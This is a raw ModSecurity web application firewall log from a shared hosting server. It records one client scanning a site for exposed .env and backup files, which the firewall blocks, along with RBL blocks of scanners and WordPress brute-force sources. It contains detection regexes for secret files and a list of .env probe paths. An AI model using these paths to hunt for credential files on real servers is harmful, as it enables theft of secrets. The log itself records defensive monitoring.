[Tue May 26 14:49:44.552524 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs0wAAANA"]
[Tue May 26 14:49:44.575978 2026] [security2:error] [pid 648203:tid 648359] [client 20.172.36.113:60792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 113.36.172.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "midrivermarina.com"] [uri "/ss.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs1QAAAJ8"]
[Tue May 26 14:49:44.621314 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs4gAAAPk"]
[Tue May 26 14:49:44.627123 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs4AAAAJc"]
[Tue May 26 14:49:44.628155 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs5AAAANI"]
[Tue May 26 14:49:44.628170 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs8QAAALw"]
[Tue May 26 14:49:44.632690 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs8wAAAN8"]
[Tue May 26 14:49:44.636513 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs4wAAAO4"]
[Tue May 26 14:49:44.636581 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs8gAAALc"]
[Tue May 26 14:49:44.637869 2026] [security2:error] [pid 648203:tid 648384] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs9AAAALg"]
[Tue May 26 14:49:44.650728 2026] [security2:error] [pid 648203:tid 648431] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs9wAAAOc"]
[Tue May 26 14:49:44.659129 2026] [security2:error] [pid 648203:tid 648353] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs9QAAAJk"]
[Tue May 26 14:49:44.750818 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs_QAAAP0"]
[Tue May 26 14:49:44.770794 2026] [security2:error] [pid 648203:tid 648263] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/s3/.env.bak"] [unique_id "ahVlsLEQDDtxJNiDrdTtCgAA3Ts"]
[Tue May 26 14:49:44.919999 2026] [security2:error] [pid 648203:tid 648257] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/.env"] [unique_id "ahVlsLEQDDtxJNiDrdTtMQAA3TU"]
[Tue May 26 14:49:44.931923 2026] [security2:error] [pid 648203:tid 648254] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/api/.env"] [unique_id "ahVlsLEQDDtxJNiDrdTtMgAA3TI"]
[Tue May 26 14:49:45.080222 2026] [security2:error] [pid 648203:tid 648259] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/backend/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtOAAA3Tc"]
[Tue May 26 14:49:45.281841 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtAQAAAPc"]
[Tue May 26 14:49:45.284000 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTs_gAAAM8"]
[Tue May 26 14:49:45.288546 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtBAAAAJE"]
[Tue May 26 14:49:45.294998 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtCQAAAO8"]
[Tue May 26 14:49:45.304278 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtCAAAANE"]
[Tue May 26 14:49:45.334837 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtKQAAANg"]
[Tue May 26 14:49:45.335257 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtIwAA3Sg"]
[Tue May 26 14:49:45.337830 2026] [security2:error] [pid 648203:tid 648432] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtGwAAAOg"]
[Tue May 26 14:49:45.338563 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtHwAAAKE"]
[Tue May 26 14:49:45.341043 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtKAAAAIs"]
[Tue May 26 14:49:45.342715 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtJwAAAPM"]
[Tue May 26 14:49:45.343477 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtNgAA3SI"]
[Tue May 26 14:49:45.345147 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtJgAAAN4"]
[Tue May 26 14:49:45.347453 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtOgAA3RM"]
[Tue May 26 14:49:45.347647 2026] [security2:error] [pid 648203:tid 648401] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtHQAAAMk"]
[Tue May 26 14:49:45.351239 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsLEQDDtxJNiDrdTtIgAAAPw"]
[Tue May 26 14:49:45.495259 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtQQAAj0M"]
[Tue May 26 14:49:45.505823 2026] [security2:error] [pid 648203:tid 648286] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/services/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtSwAAj1I"]
[Tue May 26 14:49:45.507298 2026] [security2:error] [pid 648203:tid 648280] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/service/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtTAAAj0w"]
[Tue May 26 14:49:45.548569 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtQwAAjxE"]
[Tue May 26 14:49:45.553295 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtQgAAjzY"]
[Tue May 26 14:49:45.557901 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtRAAAjxU"]
[Tue May 26 14:49:45.571543 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtTgAAAO0"]
[Tue May 26 14:49:45.577202 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtUwAAjyU"]
[Tue May 26 14:49:45.577383 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtWAAAALA"]
[Tue May 26 14:49:45.581558 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtRQAAj1M"]
[Tue May 26 14:49:45.582595 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXAAAAP0"]
[Tue May 26 14:49:45.583811 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXwAAAI4"]
[Tue May 26 14:49:45.584353 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXQAAAMM"]
[Tue May 26 14:49:45.588041 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtXgAAAKQ"]
[Tue May 26 14:49:45.588565 2026] [security2:error] [pid 648203:tid 648393] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtWgAAAME"]
[Tue May 26 14:49:45.599370 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtYAAAAMY"]
[Tue May 26 14:49:45.653641 2026] [security2:error] [pid 648203:tid 648277] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shared/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtZgAAqUk"]
[Tue May 26 14:49:45.654471 2026] [security2:error] [pid 648203:tid 648269] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shop/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtZwAAqUE"]
[Tue May 26 14:49:45.725876 2026] [security2:error] [pid 648203:tid 648306] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/src/.env"] [unique_id "ahVlsbEQDDtxJNiDrdTtfQAAqWY"]
[Tue May 26 14:49:46.090445 2026] [security2:error] [pid 648203:tid 648451] [client 74.249.173.207:27840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtmAAAAPs"]
[Tue May 26 14:49:46.102598 2026] [security2:error] [pid 648203:tid 648256] [remote 154.66.198.148:30178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtlQAA6jQ"]
[Tue May 26 14:49:46.219736 2026] [security2:error] [pid 648203:tid 648368] [client 104.207.38.161:59481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtOQAAAKg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:46.315485 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtaQAAAJs"]
[Tue May 26 14:49:46.318918 2026] [security2:error] [pid 648203:tid 648432] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtjwAAAOg"]
[Tue May 26 14:49:46.337321 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthAAAAKA"]
[Tue May 26 14:49:46.344014 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtcQAAAMc"]
[Tue May 26 14:49:46.344092 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtgQAAqU8"]
[Tue May 26 14:49:46.346476 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtdwAAANE"]
[Tue May 26 14:49:46.349480 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtgAAAqUo"]
